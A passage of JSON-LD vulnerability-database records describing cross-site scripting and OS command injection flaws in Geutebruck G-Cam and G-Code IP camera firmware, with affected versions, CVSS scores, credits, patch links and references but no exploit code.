            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "date": "2020-01-17T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "date": "2019-06-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "date": "2020-01-17T18:15:12.180000",
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22347"
          },
          {
            "date": "2020-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-10957"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2024-12-27T03:08:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          },
          {
            "date": "2020-02-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          },
          {
            "date": "2024-11-21T04:20:13.960000",
            "db": "NVD",
            "id": "CVE-2019-10957"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cross-site scripting vulnerability in Geutebruck\u00a0IP\u00a0Camera\u00a0G-Code and G-Cam",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014195"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-090"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1489

    Vulnerability from variot - Updated: 2024-12-28 22:51

    Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to network configuration to supply system commands to the server, leading to remote code execution as root. An OS command injection vulnerability exists in Geutebruck IP Camera G-Code and G-Cam. Information may be obtained or tampered with, and service operation may be interrupted (DoS). G-Cam is a web camera series launched by Geutebrück. G-Code is an analog video encoder launched by Geutebrück.

    Geutebrück G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability arises because externally supplied input is used to build operating system commands, and the product does not properly filter special characters and commands. Attackers can use this vulnerability to execute unauthorized operating system commands. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. (The browser-side impact described in the preceding sentences appears to be carried over from the combined BID 108579 description, which also covers the HTML-injection issue tracked as CVE-2019-10957; for this entry the stated impact is command execution on the device.) The following products of Geutebruck are affected: G-Code EEC-2xxx version 1.12.0.25 and prior; G-Cam EBC-21xx version 1.12.0.25 and prior; G-Cam EFD-22xx version 1.12.0.25 and prior; G-Cam ETHC-22xx version 1.12.0.25 and prior; G-Cam EWPC-22xx version 1.12.0.25 and prior. The affected_products data below lists version 1.12.13.2 with scope "ne", which suggests that release is not affected; confirm against the vendor advisory before relying on it.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1489",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-code/eec-2400",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2111",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2230",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2241",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2240",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ebc-2110",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2249",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/ethc-2239",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam/efd-2250",
            "scope": null,
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "g-cam",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "geutebruck",
            "version": "\u003c=1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-code/eec-2xxx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ewpc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ethc-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/efd-22xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam/ebc-21xx",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.13.2"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Romain Luyer and Guillaume Gronnier from CEIS, and Davy Douhine from RandoriSec reported these vulnerabilities to NCCIC.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-10958",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2019-10958",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2020-22345",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2019-10958",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-10958",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2019-10958",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2019-10958",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-22345",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201906-087",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras G-Code(EEC-2xxx), G-Cam(EBC-21xx/EFD-22xx/ETHC-22xx/EWPC-22xx): All versions 1.12.0.25 and prior may allow a remote authenticated attacker with access to network configuration to supply system commands to the server, leading to remote code execution as root. An OS command injection vulnerability exists in Geutebruck IP Camera G-Code and G-Cam. Information may be obtained or tampered with, and service operation may be interrupted (DoS). G-Cam is a web camera series launched by Geutebr\u00fcck. G-Code is an analog video encoder launched by Geutebr\u00fcck. \n\r\n\r\nGeutebr\u00fcck G-Cam and G-Code have OS command injection vulnerabilities. The vulnerability stems from the fact that external input is used to construct operating system commands, and the network system or product does not properly filter special characters and commands. Attackers can use this vulnerability to execute unauthorized operating system commands. \nSuccessful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and inject and execute arbitrary commands. Other attacks are also possible. Note: the browser-side impact in the preceding sentences describes script injection rather than OS command injection (CWE-78), and likely comes from an aggregated source entry that covers more than one issue. \nThe following products of Geutebruck are affected:\nG-Code EEC-2xxx version 1.12.0.25 and prior\nG-Cam EBC-21xx version 1.12.0.25 and prior\nG-Cam EFD-22xx version 1.12.0.25 and prior\nG-Cam ETHC-22xx version 1.12.0.25 and prior\nG-Cam EWPC-22xx version 1.12.0.25 and prior",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          }
        ],
        "trust": 2.43
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-10958",
            "trust": 4.1
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-19-155-03",
            "trust": 3.3
          },
          {
            "db": "BID",
            "id": "108579",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "id": "VAR-202001-1489",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          }
        ],
        "trust": 1.5020833375
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          }
        ]
      },
      "last_update_date": "2024-12-28T22:51:07.538000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/"
          },
          {
            "title": "Patch for Geutebr\u00fcck G-Cam and G-Code OS command injection vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/213555"
          },
          {
            "title": "Multiple Geutebr\u00fcck Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93176"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          },
          {
            "problemtype": "OS Command injection (CWE-78) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.5,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10958"
          },
          {
            "trust": 0.9,
            "url": "https://www.geutebrueck.com/en_en.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.securityfocus.com/bid/108579"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "db": "BID",
            "id": "108579"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2020-02-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "date": "2019-06-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "date": "2020-01-17T18:15:12.260000",
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-12T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-22345"
          },
          {
            "date": "2019-06-05T00:00:00",
            "db": "BID",
            "id": "108579"
          },
          {
            "date": "2024-12-27T03:07:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          },
          {
            "date": "2020-01-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          },
          {
            "date": "2024-11-21T04:20:14.093000",
            "db": "NVD",
            "id": "CVE-2019-10958"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OS command injection vulnerability in Geutebruck IP Camera G-Code and G-Cam",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-014196"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system command injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201906-087"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202008-0367

    Vulnerability from variot - Updated: 2024-11-23 22:33

    Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5). An OS command injection vulnerability exists in G-Cam and G-Code. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Geutebruck GmbH is a German high-tech private company that specializes in designing and producing high-quality, perfectly matched video security solutions.

    Geutebruck IP Cameras authenticated RCE vulnerability


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202008-0367",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.25"
          },
          {
            "model": "g-cam ethc-2230",
